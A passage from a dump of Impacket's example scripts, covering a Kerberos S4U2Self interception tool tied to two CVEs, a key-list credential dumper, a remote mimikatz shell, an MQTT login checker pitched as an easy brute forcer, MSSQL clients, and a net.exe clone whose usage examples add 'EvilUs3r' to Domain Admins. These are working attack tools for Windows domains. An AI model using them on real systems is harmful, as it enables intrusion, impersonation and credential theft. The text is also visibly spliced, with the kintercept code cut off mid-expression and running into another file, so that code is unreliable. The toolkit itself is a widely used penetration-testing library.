logging.error(\"You must specify the KDC HostName or IP Address\")\n sys.exit(1)\n if options.target_ip is None:\n options.target_ip = remoteName\n if domain == '':\n logging.error(\"You must specify a target domain\")\n sys.exit(1)\n if username == '':\n logging.error(\"You must specify a username\")\n sys.exit(1)\n if password == '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n keylistdumper = KeyListDump(remoteName, username, password, domain, options, True, targets=[])\n\n try:\n keylistdumper.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n\n traceback.print_exc()\n logging.error(e)" }, { "path": "examples/kintercept.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Copyright (c) 2017 @MrAnde7son\n#\n# Copyright and licensing note from kintercept.py:\n#\n# MIT Licensed\n# Copyright (c) 2019 Isaac Boukris \n#\n# A tool for intercepting TCP streams and for testing KDC handling\n# of PA-FOR-USER with unkeyed checksums in MS Kerberos S4U2Self\n# protocol extention (CVE-2018-16860 and CVE-2019-0734).\n#\n# The tool listens on a local port (default 88), to which the hijacked\n# connections should be redirected (via port forwarding, etc), and sends\n# all the packets to the upstream DC server.\n# If s4u2else handler is set, the name in PA-FOR-USER padata in every proxied\n# packet will be changed to the name specified in the handler's argument.\n#\n# Example: kintercept.py --request-handler s4u2else:administrator dc-ip-addr\n#\nimport struct, socket, argparse, asyncore\nfrom binascii import crc32\nfrom pyasn1.codec.der import decoder, encoder\nfrom pyasn1.type.univ import noValue\nfrom impacket import version\nfrom impacket.krb5 import constants\nfrom impacket.krb5.crypto import Cksumtype\nfrom impacket.krb5.asn1 import TGS_REQ, TGS_REP, seq_set, PA_FOR_USER_ENC\nfrom impacket.krb5.types import Principal\n\nfrom impacket.examples import logger\n\n\nMAX_READ_SIZE = 16000\nMAX_BUFF_SIZE = 32000\nLISTEN_QUEUE = 10\nTYPE = 10\n\ndef process_s4u2else_req(data, impostor):\n try:\n tgs = decoder.decode(data, asn1Spec = TGS_REQ())[0]\n except:\n print ('Record is not a TGS-REQ')\n return ''\n\n pa_tgs_req = pa_for_user = None\n\n for pa in tgs['padata']:\n if pa['padata-type'] == constants.PreAuthenticationDataTypes.PA_TGS_REQ.value:\n pa_tgs_req = pa\n elif pa['padata-type'] == constants.PreAuthenticationDataTypes.PA_FOR_USER.value:\n pa_for_user = pa\n\n if not pa_tgs_req or not pa_for_user:\n print ('TGS request is not S4U')\n return ''\n\n tgs['padata'] = noValue\n tgs['padata'][0] = pa_tgs_req\n\n try:\n for_user_obj = decoder.decode(pa_for_user['padata-value'], asn1Spec = PA_FOR_USER_ENC())[0]\n except:\n print ('Failed to decode PA_FOR_USER!')\n return ''\n\n S4UByteArray = struct.pack('= 0:\n soFar += SIMULTANEOUS\n continue\n elif str(e).find('STATUS_SOME_NOT_MAPPED') >= 0:\n resp = e.get_packet()\n else: \n raise\n\n for n, item in enumerate(resp['TranslatedNames']['Names']):\n if item['Use'] != SID_NAME_USE.SidTypeUnknown:\n print(\"%d: %s\\\\%s (%s)\" % (\n soFar + n, resp['ReferencedDomains']['Domains'][item['DomainIndex']]['Name'], item['Name'],\n SID_NAME_USE.enumItems(item['Use']).name))\n soFar += SIMULTANEOUS\n\n dce.disconnect()\n\n return entries\n\n\n# Process command-line arguments.\nif __name__ == '__main__':\n # Explicitly changing the stdout encoding format\n if sys.stdout.encoding is None:\n # Output is redirected to a file\n sys.stdout = codecs.getwriter('utf8')(sys.stdout)\n print(version.BANNER)\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('maxRid', action='store', default = '4000', nargs='?', help='max Rid to check (default 4000)')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-target-ip', action='store', metavar=\"ip address\", help='IP Address of the target machine. '\n 'If omitted it will use whatever was specified as target. This is useful when target is the '\n 'NetBIOS name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n group.add_argument('-domain-sids', action='store_true', help='Enumerate Domain SIDs (will likely forward requests to the DC)')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful when proxying through smbrelayx)')\n group.add_argument('-k', action=\"store_true\", \n help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n lookup = LSALookupSid(username, password, domain, int(options.port), options.hashes, options.domain_sids, options.k, options.maxRid)\n try:\n lookup.dump(remoteName, options.target_ip)\n except:\n pass\n" }, { "path": "examples/machine_role.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Through MS-DSSP, this script retrieves a host's role along with\n# its primary domain details.\n#\n# This may be particularly useful when it is used in a script where \n# further operations depend on knowing the role of its target, \n# e.g. \"I do not want to perform this on a DC\".\n#\n# Author:\n# Simon Decosse (@simondotsh)\n#\n\nimport sys\nimport logging\nimport argparse\n\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket import version\nfrom impacket.uuid import bin_to_string\nfrom impacket.dcerpc.v5 import transport, dssp\n\nclass MachineRole:\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dssp/09f0677f-52e5-454d-9a65-0e8d8ba6fdeb\n MACHINE_ROLES = {\n dssp.DSROLE_MACHINE_ROLE.DsRole_RoleStandaloneWorkstation: \n 'Standalone Workstation',\n dssp.DSROLE_MACHINE_ROLE.DsRole_RoleMemberWorkstation: \n 'Domain-joined Workstation',\n dssp.DSROLE_MACHINE_ROLE.DsRole_RoleStandaloneServer: \n 'Standalone Server',\n dssp.DSROLE_MACHINE_ROLE.DsRole_RoleMemberServer: \n 'Domain-joined Server',\n dssp.DSROLE_MACHINE_ROLE.DsRole_RoleBackupDomainController: \n 'Backup Domain Controller',\n dssp.DSROLE_MACHINE_ROLE.DsRole_RolePrimaryDomainController: \n 'Primary Domain Controller'\n }\n\n def __init__(self, username='', password='', domain='', hashes=None,\n aesKey=None, doKerberos=False, kdcHost=None, port=445):\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = aesKey\n self.__doKerberos = doKerberos\n self.__kdcHost = kdcHost\n self.__port = port\n\n if hashes is not None:\n self.__lmhash, self.__nthash = hashes.split(':')\n\n def print_info(self, remoteName, remoteHost):\n try:\n dce = self.__authenticate(remoteName, remoteHost)\n except Exception as e:\n self.__log_and_exit(str(e))\n\n try:\n output = self.__fetch(dce)\n except Exception as e:\n self.__log_and_exit(str(e))\n\n for key, value in output.items():\n print('%s: %s' % (key, value))\n\n dce.disconnect()\n\n def __authenticate(self, remoteName, remoteHost):\n dce = self.__get_transport(remoteName, remoteHost)\n\n dce.connect()\n dce.bind(dssp.MSRPC_UUID_DSSP)\n\n return dce\n\n def __get_transport(self, remoteName, remoteHost):\n stringbinding = r'ncacn_np:%s[\\pipe\\lsarpc]' % remoteName\n logging.debug('StringBinding %s' % stringbinding)\n rpctransport = transport.DCERPCTransportFactory(stringbinding)\n rpctransport.set_dport(self.__port)\n rpctransport.setRemoteHost(remoteHost)\n\n if hasattr(rpctransport, 'set_credentials'):\n # This method exists only for selected protocol sequences.\n rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,\n self.__nthash, self.__aesKey)\n rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n\n return rpctransport.get_dce_rpc()\n\n def __fetch(self, dce):\n output = {}\n domain_info = dssp.hDsRolerGetPrimaryDomainInformation(dce, 1)\n\n output['Machine Role'] = self.MACHINE_ROLES[domain_info['DomainInfo']['DomainInfoBasic']['MachineRole']]\n output['NetBIOS Domain Name'] = domain_info['DomainInfo']['DomainInfoBasic']['DomainNameFlat']\n output['Domain Name'] = domain_info['DomainInfo']['DomainInfoBasic']['DomainNameDns']\n output['Forest Name'] = domain_info['DomainInfo']['DomainInfoBasic']['DomainForestName']\n output['Domain GUID'] = bin_to_string(domain_info['DomainInfo']['DomainInfoBasic']['DomainGuid'])\n\n return output\n\n def __log_and_exit(self, error):\n logging.critical('Error while enumerating host: %s' % error)\n sys.exit(1)\n\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description='Retrieve a host\\'s role along with its primary domain details.')\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store',metavar='ip address', help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-target-ip', action='store', metavar='ip address', help='IP Address of the target machine. If '\n 'ommited it will use whatever was specified as target. This is useful when target is the NetBIOS '\n 'name and you cannot resolve it')\n group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar=\"destination port\",\n help='Destination port to connect to SMB Server')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action='store', metavar='LMHASH:NTHASH', help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action='store_true', help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action='store_true', help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action='store', metavar='hex key', help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n if options.aesKey is not None:\n options.k = True\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass('Password:')\n\n machine_role = MachineRole(username, password, domain, options.hashes, options.aesKey, options.k, options.dc_ip, int(options.port))\n machine_role.print_info(remoteName, options.target_ip)\n " }, { "path": "examples/mimikatz.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# SMB DCE/RPC\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport cmd\nimport logging\nimport os\nimport sys\n\nfrom impacket import version\nfrom impacket.dcerpc.v5 import epm, mimilib\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE\nfrom impacket.dcerpc.v5.transport import DCERPCTransportFactory\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\n\ntry:\n from Cryptodome.Cipher import ARC4\nexcept Exception:\n logging.critical(\"Warning: You don't have any crypto installed. You need pycryptodomex\")\n logging.critical(\"See https://pypi.org/project/pycryptodomex/\")\n\n\nmimikatz_intro = r\"\"\"Type help for list of commands\"\"\"\n\n\nclass MimikatzShell(cmd.Cmd):\n def __init__(self, dce):\n cmd.Cmd.__init__(self)\n self.shell = None\n\n self.prompt = 'mimikatz # '\n self.tid = None\n self.intro = mimikatz_intro\n self.pwd = ''\n self.share = None\n self.loggedIn = True\n self.last_output = None\n\n self.dce = dce\n\n dh = mimilib.MimiDiffeH()\n blob = mimilib.PUBLICKEYBLOB()\n blob['y'] = dh.genPublicKey()[::-1]\n publicKey = mimilib.MIMI_PUBLICKEY()\n publicKey['sessionType'] = mimilib.CALG_RC4\n publicKey['cbPublicKey'] = 144\n publicKey['pbPublicKey'] = blob.getData()\n resp = mimilib.hMimiBind(self.dce, publicKey)\n blob = mimilib.PUBLICKEYBLOB(b''.join(resp['serverPublicKey']['pbPublicKey']))\n\n self.key = dh.getSharedSecret(blob['y'][::-1])[-16:][::-1]\n self.pHandle = resp['phMimi']\n\n def emptyline(self):\n pass\n\n def precmd(self,line):\n # switch to unicode\n #return line.encode('utf-8')\n return line\n\n def default(self, line):\n if line.startswith('*'):\n line = line[1:]\n command = (line.strip('\\n')+'\\x00').encode('utf-16le')\n command = ARC4.new(self.key).encrypt(command)\n resp = mimilib.hMimiCommand(self.dce, self.pHandle, command)\n cipherText = b''.join(resp['encResult'])\n cipher = ARC4.new(self.key)\n print(cipher.decrypt(cipherText).decode('utf-16le'))\n\n def onecmd(self,s):\n retVal = False\n try:\n retVal = cmd.Cmd.onecmd(self,s)\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.error(e)\n\n return retVal\n\n def do_exit(self,line):\n if self.shell is not None:\n self.shell.close()\n return True\n\n def do_shell(self, line):\n output = os.popen(line).read()\n print(output)\n self.last_output = output\n\n def do_help(self,line):\n self.default('::')\n\ndef main():\n print(version.BANNER)\n parser = argparse.ArgumentParser(add_help = True, description = \"SMB client implementation.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '\n 'the target parameter')\n group.add_argument('-target-ip', action='store', metavar=\"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, address = parse_target(options.target)\n\n if options.target_ip is None:\n options.target_ip = address\n\n if domain is None:\n domain = ''\n \n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.aesKey is not None:\n options.k = True\n\n if options.hashes is not None:\n lmhash, nthash = options.hashes.split(':')\n else:\n lmhash = ''\n nthash = ''\n\n bound = False\n \n try:\n if username != '':\n try:\n # Let's try to do everything through SMB. If we'e lucky it might get everything encrypted\n rpctransport = DCERPCTransportFactory(r'ncacn_np:%s[\\pipe\\epmapper]'%address)\n rpctransport.set_credentials(username, password, domain, lmhash, nthash, options.aesKey)\n dce = rpctransport.get_dce_rpc()\n if options.k:\n rpctransport.set_kerberos(True, options.dc_ip)\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n dce.connect()\n # Give me the endpoint please!\n stringBinding = epm.hept_map(address, mimilib.MSRPC_UUID_MIMIKATZ, protocol = 'ncacn_np', dce=dce)\n\n # Thanks, let's now use the same SMB Connection to bind to mimi\n rpctransport2 = DCERPCTransportFactory(stringBinding)\n rpctransport2.set_smb_connection(rpctransport.get_smb_connection())\n dce = rpctransport2.get_dce_rpc()\n if options.k:\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n dce.connect()\n dce.bind(mimilib.MSRPC_UUID_MIMIKATZ)\n bound = True\n except Exception as e:\n if str(e).find('ept_s_not_registered') >=0:\n # Let's try ncacn_ip_tcp\n stringBinding = epm.hept_map(address, mimilib.MSRPC_UUID_MIMIKATZ, protocol = 'ncacn_ip_tcp')\n else:\n raise\n\n else:\n stringBinding = epm.hept_map(address, mimilib.MSRPC_UUID_MIMIKATZ, protocol = 'ncacn_ip_tcp')\n\n if bound is False:\n rpctransport = DCERPCTransportFactory(stringBinding)\n rpctransport.set_credentials(username, password, domain, lmhash, nthash, options.aesKey)\n dce = rpctransport.get_dce_rpc()\n if options.k is True:\n rpctransport.set_kerberos(True, options.dc_ip)\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n rpctransport.set_credentials(username, password, domain, lmhash, nthash)\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n dce.connect()\n dce.bind(mimilib.MSRPC_UUID_MIMIKATZ)\n\n shell = MimikatzShell(dce)\n\n if options.file is not None:\n logging.info(\"Executing commands from %s\" % options.file.name)\n for line in options.file.readlines():\n if line[0] != '#':\n print(\"# %s\" % line, end=' ')\n shell.onecmd(line)\n else:\n print(line, end=' ')\n else:\n shell.cmdloop()\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.error(str(e))\n\nif __name__ == \"__main__\":\n main()\n" }, { "path": "examples/mqtt_check.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Simple MQTT example aimed at playing with different login options. Can be converted into a account/password\n# brute forcer quite easily.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# MQTT and Structure\n#\n\nfrom __future__ import print_function\n\nimport argparse\nimport logging\nimport sys\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.mqtt import CONNECT_ACK_ERROR_MSGS, MQTTConnection\n\nclass MQTT_LOGIN:\n def __init__(self, username, password, target, options):\n self._options = options\n self._username = username\n self._password = password\n self._target = target\n\n if self._username == '':\n self._username = None\n\n def run(self):\n mqtt = MQTTConnection(self._target, int(self._options.port), self._options.ssl)\n\n if self._options.client_id is None:\n clientId = ' '\n else:\n clientId = self._options.client_id\n\n mqtt.connect(clientId, self._username, self._password)\n\n logging.info(CONNECT_ACK_ERROR_MSGS[0])\n\nif __name__ == '__main__':\n print(version.BANNER)\n parser = argparse.ArgumentParser(add_help=False,\n description=\"MQTT login check\")\n parser.add_argument(\"--help\", action=\"help\", help='show this help message and exit')\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-client-id', action='store', help='Client ID used when authenticating (default random)')\n parser.add_argument('-ssl', action='store_true', help='turn SSL on')\n parser.add_argument('-port', action='store', default='1883', help='port to connect to (default 1883)')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n try:\n options = parser.parse_args()\n except Exception as e:\n logging.error(str(e))\n sys.exit(1)\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, address = parse_target(options.target)\n\n check_mqtt = MQTT_LOGIN(username, password, address, options)\n try:\n check_mqtt.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n logging.error(e)\n" }, { "path": "examples/mssqlclient.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-TDS] & [MC-SQLR] example.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# Structure\n#\n\nimport argparse\nimport sys\nimport logging\n\nfrom impacket.examples import logger\nfrom impacket.examples.mssqlshell import SQLSHELL\nfrom impacket.examples.utils import parse_target\nfrom impacket import version, tds\n\n\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"TDS client implementation (SSL supported).\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-db', action='store', help='MSSQL database instance (default None)')\n parser.add_argument('-windows-auth', action='store_true', default=False, help='whether or not to use Windows '\n 'Authentication (default False)')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-show', action='store_true', help='show the queries')\n parser.add_argument('-command', action='extend', nargs='*', help='Commands to execute in the SQL shell. Multiple commands can be passed.')\n parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the SQL shell')\n\n parser.add_argument('--host-name', action='store', default='', help='HostName property to use when connecting to the MSSQLServer')\n parser.add_argument('--app-name', action='store', default='', help='AppName property to use when connecting to the MSSQLServer')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-target-ip', action='store', metavar = \"ip address\",\n help='IP Address of the target machine. If omitted it will use whatever was specified as target. '\n 'This is useful when target is the NetBIOS name and you cannot resolve it')\n group.add_argument('-port', action='store', default='1433', help='target MSSQL port (default 1433)')\n\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, remoteName = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n if options.target_ip is None:\n options.target_ip = remoteName\n\n if options.aesKey is not None:\n options.k = True\n\n ms_sql = tds.MSSQL(options.target_ip, int(options.port), remoteName, workstation_id=options.host_name, application_name=options.app_name)\n ms_sql.connect()\n try:\n if options.k is True:\n res = ms_sql.kerberosLogin(options.db, username, password, domain, options.hashes, options.aesKey,\n kdcHost=options.dc_ip)\n else:\n res = ms_sql.login(options.db, username, password, domain, options.hashes, options.windows_auth)\n ms_sql.printReplies()\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.error(str(e))\n res = False\n if res is True:\n shell = SQLSHELL(ms_sql, options.show)\n if options.file:\n for line in options.file.readlines():\n print(\"SQL> %s\" % line, end=' ')\n shell.onecmd(line)\n elif options.command:\n for c in options.command:\n print(\"SQL> %s\" % c)\n shell.onecmd(c)\n else:\n shell.cmdloop()\n ms_sql.disconnect()\n" }, { "path": "examples/mssqlinstance.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MC-SQLR] example. Retrieves the instances names from the target host\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# Structure\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport sys\nimport logging\n\nfrom impacket.examples import logger\nfrom impacket import version, tds\n\nif __name__ == '__main__':\n\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Asks the remote host for its running MSSQL Instances.\")\n\n parser.add_argument('host', action='store', help='target host')\n parser.add_argument('-timeout', action='store', default='5', help='timeout to wait for an answer')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n \n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n ms_sql = tds.MSSQL(options.host)\n instances = ms_sql.getInstances(int(options.timeout))\n if len(instances) == 0:\n print(\"No MSSQL Instances found\")\n else:\n for i, instance in enumerate(instances):\n logging.info(\"Instance %d\" % i)\n for key in list(instance.keys()):\n print(key + \":\" + instance[key])\n" }, { "path": "examples/net.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Impacket alternative for windows net.exe commandline utility.\n# Thanks to rpc protocol, the special feature of this tool is \n# making net.exe functionalities available from remote computer.\n#\n# e.g:\n# python net.py Administrator:password@targetMachine localgroup\n# python net.py Administrator:password@targetMachine user\n# python net.py Administrator:password@targetMachine group\n# python net.py Administrator:password@targetMachine computer\n# python net.py Administrator:password@targetMachine localgroup -name Administrators\n# python net.py Administrator:password@targetMachine user -name Administrator\n# python net.py Administrator:password@targetMachine group -name \"Domain Admins\"\n# python net.py Administrator:password@targetMachine computer -name DC$\n# python net.py Administrator:password@targetMachine group -name \"Domain Admins\" -join EvilUs3r\n# python net.py Administrator:password@targetMachine user -enable EvilUs3r\n# python net.py Administrator:password@targetMachine user -disable EvilUs3r\n#\n# Author:\n# Alex Romero (@NtAlexio2)\n#\n# Reference for:\n# [MS-SAMR]\n# \n\nimport sys\nimport argparse\nimport logging\nfrom datetime import datetime\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.dcerpc.v5 import transport, samr, lsad, lsat\nfrom impacket.smbconnection import SMBConnection\n\n\nclass LsaTranslator:\n def __init__(self, smbConnection):\n self._smbConnection = smbConnection\n self.__stringBindingSamr = r'ncacn_np:445[\\pipe\\lsarpc]'\n self._lsat_dce = None\n self.Connect()\n\n def Connect(self):\n rpc = transport.DCERPCTransportFactory(self.__stringBindingSamr)\n rpc.set_smb_connection(self._smbConnection)\n self._lsat_dce = rpc.get_dce_rpc()\n self._lsat_dce.connect()\n self._lsat_dce.bind(lsat.MSRPC_UUID_LSAT)\n\n def LookupName(self, name):\n policyHandle = lsad.hLsarOpenPolicy2(self._lsat_dce)['PolicyHandle']\n resp = lsat.hLsarLookupNames3(self._lsat_dce, policyHandle, (name, ))\n lsad.hLsarClose(self._lsat_dce, policyHandle)\n return resp['TranslatedSids']['Sids'][0]['Sid']\n\n def LookupSids(self, sid_list):\n policyHandle = lsad.hLsarOpenPolicy2(self._lsat_dce)['PolicyHandle']\n resp = lsat.hLsarLookupSids2(self._lsat_dce, policyHandle, sid_list)\n lsad.hLsarClose(self._lsat_dce, policyHandle)\n return resp['TranslatedNames']['Names']\n\n\nclass SamrObject:\n def __init__(self, smbConnection):\n self._smbConnection = smbConnection\n self.__stringBindingSamr = r'ncacn_np:445[\\pipe\\samr]'\n self._dce = None\n self._domain_handle = None\n self._translator = None\n self._connect()\n\n def _connect(self):\n rpc = transport.DCERPCTransportFactory(self.__stringBindingSamr)\n rpc.set_smb_connection(self._smbConnection)\n self._dce = rpc.get_dce_rpc()\n self._dce.connect()\n self._dce.bind(samr.MSRPC_UUID_SAMR)\n\n def _get_user_sid(self, username):\n if self._translator is None:\n self._translator = LsaTranslator(self._smbConnection)\n return self._translator.LookupName(username)\n\n def _resolve_sid(self, sid_list):\n if self._translator is None:\n self._translator = LsaTranslator(self._smbConnection)\n return self._translator.LookupSids(sid_list)\n\n def _get_object_rid(self, domain_handle, object_name):\n response = samr.hSamrLookupNamesInDomain(self._dce, domain_handle, (object_name,))\n object_id = response['RelativeIds']['Element'][0]['Data']\n return object_id\n\n def _get_user_handle(self, domain_handle, username):\n user_rid = 